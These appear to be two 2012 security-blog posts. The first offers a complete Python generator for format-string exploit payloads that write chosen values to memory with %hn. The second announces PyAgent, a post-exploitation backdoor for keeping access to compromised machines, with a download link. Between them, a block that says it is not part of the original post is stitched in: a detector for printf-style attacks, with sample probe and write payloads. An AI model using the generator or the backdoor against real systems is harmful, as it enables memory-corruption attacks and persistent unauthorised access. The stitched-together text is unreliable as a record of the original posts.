Friday, July 13, 2012

Those annoying format string exploits

Format string exploits are a pain to write manually, and it's really easy to make an error, adjust a bunch of stuff, and then realize that you had the wrong offset and everything needs to be recalculated.  I got fed up tonight and (based on the short (2-byte) write examples in [Table 12-2]) wrote a little program to automate it for me.  I know there are many examples of this out there (@tlas toolbelt, etc.), but I felt like I needed to go through the process to cement my understanding of it.  And I like Python more than Perl. SO:


#! /usr/bin/env python
from sys import argv
import struct

if len(argv) < 4:
    print 'usage:\n\t'+argv[0]+'  <addr_to_write_to>  <addr_to_write> <offset>'
    exit(0)

addr_to_write_to = int(argv[1], 16)  # target address (hex)
addr_to_write    = int(argv[2], 16)  # 32-bit value to put there (hex)
offset           = int(argv[3])      # stack slot of the first packed address

# Split the value into its high- and low-order 16-bit halves.  Each half is
# written by its own %hn, so the smaller one has to be written first: the
# character counter only ever goes up.
HOB = int((addr_to_write & 0xffff0000) >> 16)
LOB = int((addr_to_write & 0x0000ffff))

# The two packed addresses are the first 8 bytes printed, hence the "-8" on
# the first precision (this assumes both halves are >= 8).
s = ''
if (HOB < LOB):
    s += struct.pack('<I', addr_to_write_to+2)  # slot  offset  : high half
    s += struct.pack('<I', addr_to_write_to)    # slot offset+1 : low half
    s += '%.'+str(HOB-8)+'x'
    s += '%'+str(offset)+'$hn'
    s += '%.'+str(LOB-HOB)+'x'
    s += '%'+str(offset+1)+'$hn'
elif (HOB > LOB):
    s += struct.pack('<I', addr_to_write_to+2)
    s += struct.pack('<I', addr_to_write_to)
    s += '%.'+str(LOB-8)+'x'
    s += '%'+str(offset+1)+'$hn'
    s += '%.'+str(HOB-LOB)+'x'
    s += '%'+str(offset)+'$hn'
else: #HOB == LOB
    s += struct.pack('<I', addr_to_write_to+2)
    s += struct.pack('<I', addr_to_write_to)
    s += '%.'+str(HOB-8)+'x'
    s += '%'+str(offset)+'$hn'
    s += '%.'+str(0x10000)+'x'  # wrap the 16-bit counter so the second %hn sees the same value
    s += '%'+str(offset+1)+'$hn'

print s
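The flip side of the generator above, added here as an example that is not part of the original post: a small classifier for untrusted input that might reach a printf-style call unescaped. It parses every conversion specification, counts the padding the directives ask for, and flags any %n-family write. The function name, the sample inputs and the two thresholds are assumptions of this example.

```python
import re

# One printf conversion specification: optional positional "n$", flags,
# width, precision, length modifier and the conversion character.
SPEC = re.compile(
    r'%(?P<pos>\d+\$)?[-+ #0]*(?P<width>\d+|\*)?(?:\.(?P<prec>\d+|\*))?'
    r'(?P<len>hh|h|ll|l|q|L|j|z|t)?(?P<conv>[diouxXeEfFgGaAcspn%])'
)

# Thresholds are assumptions for this example, not values from the post:
# eight or more directives looks like a stack-read probe ("%08x.%08x..."),
# and 1 KiB of requested padding is far more than ordinary text asks for.
MAX_DIRECTIVES = 8
MAX_PADDING = 1024

def analyse_format_input(data):
    """Return the directive count, every %n-family write as
    (positional slot or None, length modifier), the total padding the
    directives request, and a verdict for one piece of untrusted input."""
    text = data.decode('latin-1') if isinstance(data, bytes) else data
    directives, padding, writes = 0, 0, []
    for m in SPEC.finditer(text):
        if m.group('conv') == '%':      # "%%" is a literal percent sign
            continue
        directives += 1
        for field in ('width', 'prec'):
            if m.group(field) and m.group(field) != '*':
                padding += int(m.group(field))
        if m.group('conv') == 'n':      # the only conversion that writes memory
            pos = m.group('pos')
            writes.append((int(pos[:-1]) if pos else None, m.group('len') or ''))
    suspicious = bool(writes) or directives >= MAX_DIRECTIVES or padding >= MAX_PADDING
    return {'directives': directives, 'writes': writes,
            'padding': padding, 'suspicious': suspicious}

# Constructed sample inputs (not captured data).  The last one has the shape
# the script above emits: two 4-byte address slots (here just "AAAA"/"BBBB"),
# padding, a positional short write, more padding, a second short write.
SAMPLES = {
    'plain':       b'alice smith',
    'url_encoded': b'name=alice%20smith&q=100%25',   # "%20s" parses as a directive
    'stack_probe': b'%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x',
    'short_write': b'AAAABBBB%.2040x%7$hn%.30720x%8$hn',
}

if __name__ == '__main__':
    for name, sample in SAMPLES.items():
        print(name, analyse_format_input(sample))
```

Note the url_encoded case: a stray "%20s" from URL encoding does parse as a directive, which is why the verdict keys on writes and padding rather than on the mere presence of a percent sign.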

Tuesday, July 3, 2012

PyAgent 1.0

Hurray!  After months of being ignored, I've finally gotten around to cleaning up and refactoring PyAgent.  For those of you who do not know what this is, it is a post-exploitation agent, used once a system has been compromised to maintain access, that provides a more interactive and developer-friendly backdoor (as opposed to meterpreter, which, whilst much more sexy, is written in assembly with Ruby strains).

And yes, PyAgent is essentially a ripoff of meterpreter by Rapid7 and/or Hydrogen by CANVAS.  But it's in Python, open-sourced (on BitBucket and Serenity-Blue), and modifiable in a clean format (adding functionality is SUPER easy).  So, here you go:

http://serenity-blue.com/PyAgent/index.html